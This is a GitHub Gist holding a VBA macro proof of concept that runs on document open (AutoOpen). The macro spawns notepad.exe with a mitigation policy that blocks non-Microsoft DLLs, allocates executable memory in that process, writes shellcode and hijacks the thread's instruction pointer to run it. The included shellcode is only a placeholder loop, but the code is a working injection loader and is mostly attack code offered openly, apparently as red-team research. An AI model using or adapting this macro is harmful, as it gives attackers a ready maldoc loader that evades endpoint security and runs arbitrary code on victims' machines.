-
-
Save lesnuages/1f9d048550d51b60fa57c9bf9b5496ea to your computer and use it in GitHub Desktop.
PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON POC via VBA
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
' by @_xpn_ | |
' | |
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
Const HEAP_ZERO_MEMORY = &H8& | |
Const SW_HIDE = &H0& | |
Const MAX_PATH = 260 | |
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 | |
Const MAXIMUM_SUPPORTED_EXTENSION = 512 | |
Const SIZE_OF_80387_REGISTERS = 80 | |
Const MEM_COMMIT = &H1000 | |
Const MEM_RESERVE = &H2000 | |
Const PAGE_READWRITE = &H4 | |
Const PAGE_EXECUTE_READWRITE = &H40 | |
Const CONTEXT_FULL = &H10007 | |
Private Type PROCESS_INFORMATION | |
hProcess As LongPtr | |
hThread As LongPtr | |
dwProcessId As Long | |
dwThreadId As Long | |
End Type | |
Private Type STARTUP_INFO | |
cb As Long | |
lpReserved As String | |
lpDesktop As String | |
lpTitle As String | |
dwX As Long | |
dwY As Long | |
dwXSize As Long | |
dwYSize As Long | |
dwXCountChars As Long | |
dwYCountChars As Long | |
dwFillAttribute As Long | |
dwFlags As Long | |
wShowWindow As Integer | |
cbReserved2 As Integer | |
lpReserved2 As Byte | |
hStdInput As LongPtr | |
hStdOutput As LongPtr | |
hStdError As LongPtr | |
End Type | |
Private Type STARTUPINFOEX | |
STARTUPINFO As STARTUP_INFO | |
lpAttributelist As LongPtr | |
End Type | |
Private Type DWORD64 | |
dwPart1 As Long | |
dwPart2 As Long | |
End Type | |
Private Type FLOATING_SAVE_AREA | |
ControlWord As Long | |
StatusWord As Long | |
TagWord As Long | |
ErrorOffset As Long | |
ErrorSelector As Long | |
DataOffset As Long | |
DataSelector As Long | |
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte | |
Spare0 As Long | |
End Type | |
Private Type CONTEXT | |
ContextFlags As Long | |
Dr0 As Long | |
Dr1 As Long | |
Dr2 As Long | |
Dr3 As Long | |
Dr6 As Long | |
Dr7 As Long | |
FloatSave As FLOATING_SAVE_AREA | |
SegGs As Long | |
SegFs As Long | |
SegEs As Long | |
SegDs As Long | |
Edi As Long | |
Esi As Long | |
Ebx As Long | |
Edx As Long | |
Ecx As Long | |
Eax As Long | |
Ebp As Long | |
Eip As Long | |
SegCs As Long | |
EFlags As Long | |
Esp As Long | |
SegSs As Long | |
ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte | |
End Type | |
Private Declare PtrSafe Function CreateProcess Lib "kernel32.dll" Alias "CreateProcessA" ( _ | |
ByVal lpApplicationName As String, _ | |
ByVal lpCommandLine As String, _ | |
lpProcessAttributes As Long, _ | |
lpThreadAttributes As Long, _ | |
ByVal bInheritHandles As Long, _ | |
ByVal dwCreationFlags As Long, _ | |
lpEnvironment As Any, _ | |
ByVal lpCurrentDriectory As String, _ | |
ByVal lpStartupInfo As LongPtr, _ | |
lpProcessInformation As PROCESS_INFORMATION _ | |
) As Long | |
Private Declare PtrSafe Function InitializeProcThreadAttributeList Lib "kernel32.dll" ( _ | |
ByVal lpAttributelist As LongPtr, _ | |
ByVal dwAttributeCount As Integer, _ | |
ByVal dwFlags As Integer, _ | |
ByRef lpSize As Integer _ | |
) As Boolean | |
Private Declare PtrSafe Function UpdateProcThreadAttribute Lib "kernel32.dll" ( _ | |
ByVal lpAttributelist As LongPtr, _ | |
ByVal dwFlags As Integer, _ | |
ByVal lpAttribute As Long, _ | |
ByVal lpValue As LongPtr, _ | |
ByVal cbSize As Integer, _ | |
ByRef lpPreviousValue As Integer, _ | |
ByRef lpReturnSize As Integer _ | |
) As Boolean | |
Private Declare Function WriteProcessMemory Lib "kernel32.dll" ( _ | |
ByVal hProcess As LongPtr, _ | |
ByVal lpBaseAddress As Long, _ | |
ByRef lpBuffer As Any, _ | |
ByVal nSize As Long, _ | |
ByVal lpNumberOfBytesWritten As Long _ | |
) As Boolean | |
Private Declare Function ResumeThread Lib "kernel32.dll" (ByVal hThread As LongPtr) As Long | |
Private Declare PtrSafe Function GetThreadContext Lib "kernel32.dll" ( _ | |
ByVal hThread As Long, _ | |
lpContext As CONTEXT _ | |
) As Long | |
Private Declare Function SetThreadContext Lib "kernel32.dll" ( _ | |
ByVal hThread As Long, _ | |
lpContext As CONTEXT _ | |
) As Long | |
Private Declare PtrSafe Function HeapAlloc Lib "kernel32.dll" ( _ | |
ByVal hHeap As LongPtr, _ | |
ByVal dwFlags As Long, _ | |
ByVal dwBytes As Long _ | |
) As LongPtr | |
Private Declare PtrSafe Function GetProcessHeap Lib "kernel32.dll" () As LongPtr | |
Private Declare Function VirtualAllocEx Lib "kernel32" ( _ | |
ByVal hProcess As Long, _ | |
ByVal lpAddress As Long, _ | |
ByVal dwSize As Long, _ | |
ByVal flAllocationType As Long, _ | |
ByVal flProtect As Long _ | |
) As Long | |
Sub AutoOpen() | |
Dim pi As PROCESS_INFORMATION | |
Dim si As STARTUPINFOEX | |
Dim nullStr As String | |
Dim pid, result As Integer | |
Dim threadAttribSize As Integer | |
Dim processPath As String | |
Dim val As DWORD64 | |
Dim ctx As CONTEXT | |
Dim alloc As Long | |
Dim shellcode As Variant | |
Dim myByte As Long | |
' Shellcode goes here (jmp $) | |
shellcode = Array(&HEB, &HFE) | |
' Path of process to spawn | |
processPath = "C:\\windows\\system32\\notepad.exe" | |
' Specifies PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON | |
val.dwPart1 = 0 | |
val.dwPart2 = &H1000 | |
' Initialize process attribute list | |
result = InitializeProcThreadAttributeList(ByVal 0&, 1, 0, threadAttribSize) | |
si.lpAttributelist = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, threadAttribSize) | |
result = InitializeProcThreadAttributeList(si.lpAttributelist, 1, 0, threadAttribSize) | |
' Set our mitigation policy | |
result = UpdateProcThreadAttribute( _ | |
si.lpAttributelist, _ | |
0, _ | |
PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, _ | |
VarPtr(val), _ | |
Len(val), _ | |
ByVal 0&, _ | |
ByVal 0& _ | |
) | |
si.STARTUPINFO.cb = LenB(si) | |
si.STARTUPINFO.dwFlags = 1 | |
' Spawn our process which will only allow MS signed DLL's | |
result = CreateProcess( _ | |
nullStr, _ | |
processPath, _ | |
ByVal 0&, _ | |
ByVal 0&, _ | |
1&, _ | |
&H80014, _ | |
ByVal 0&, _ | |
nullStr, _ | |
VarPtr(si), _ | |
pi _ | |
) | |
' Alloc memory (RWX for this POC, because... yolo) in process to write our shellcode to | |
alloc = VirtualAllocEx( _ | |
pi.hProcess, _ | |
0, _ | |
11000, _ | |
MEM_COMMIT + MEM_RESERVE, _ | |
PAGE_EXECUTE_READWRITE _ | |
) | |
' Write our shellcode | |
For offset = LBound(shellcode) To UBound(shellcode) | |
myByte = shellcode(offset) | |
result = WriteProcessMemory(pi.hProcess, alloc + offset, myByte, 1, ByVal 0&) | |
Next offset | |
' Point EIP register to allocated memory | |
ctx.ContextFlags = CONTEXT_FULL | |
result = GetThreadContext(pi.hThread, ctx) | |
ctx.Eip = alloc | |
result = SetThreadContext(pi.hThread, ctx) | |
' Resume execution | |
ResumeThread (pi.hThread) | |
End Sub | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment